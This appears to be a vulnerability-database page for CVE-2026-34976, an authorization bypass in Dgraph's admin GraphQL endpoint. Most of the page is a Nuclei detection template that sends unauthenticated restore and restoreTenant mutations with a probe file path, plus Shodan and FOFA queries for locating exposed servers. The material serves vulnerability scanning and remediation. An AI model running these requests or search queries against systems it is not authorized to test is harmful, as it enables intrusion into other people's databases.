CVE-2026-34976: Dgraph <=v25.3.0 - Admin Mutation Missing Authorization

2026-08-16 Dgraph PoC Public

Description

Dgraph <=v25.3.0 contains an authentication bypass caused by missing authorization middleware for the restoreTenant admin mutation, letting unauthenticated attackers overwrite the database, read files, and perform SSRF, exploit requires no authentication.

PoC

id: CVE-2026-34976

info:
  name: Dgraph <=v25.3.0 - Admin Mutation Missing Authorization
  author: str4k3r
  severity: critical
  description: |
    Dgraph <=v25.3.0 contains an authentication bypass caused by missing authorization middleware for the restoreTenant admin mutation, letting unauthenticated attackers overwrite the database, read files, and perform SSRF, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can overwrite the database, read server files, and perform SSRF, leading to full data compromise and server access.
  remediation: |
    Update to version 25.3.1 or later.
  reference:
    - https://github.com/hypermodeinc/dgraph/security/advisories/GHSA-p5rh-vmhp-gvcw
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34976
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-34976
    epss-score: 0.02036
    epss-percentile: 0.8011
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 3
    vendor: hypermodeinc
    product: dgraph
    shodan-query: title:"Dgraph"
    fofa-query: body="dgraph"
  tags: cve,cve2026,dgraph,auth-bypass,ssrf

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(body, "dgraph", "Dgraph")'
        condition: and
        internal: true

  - raw:
      - |
        POST /admin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "mutation { restore(input: { location: \"file:///nonexistent-cve-34976-probe/\" }) { code message } }"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "unauthorized ip address")'
        condition: and
        internal: true

  - raw:
      - |
        POST /admin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "mutation { restoreTenant(input: { restoreInput: { location: \"file:///nonexistent-cve-34976-probe/\" }, fromNamespace: 0 }) { code message } }"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "restoreTenant")'
          - '!contains(body, "unauthorized ip address")'
        condition: and
# digest: 4a0a004730450220604cbf6364a3d5519447eb7af59821418281551277f9042e3f44c7a65887b8f3022100e30bf0cb9a6fad703f428b9f4b38f88bce8f09ace8e2d4f44e90b6eeb3942007:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities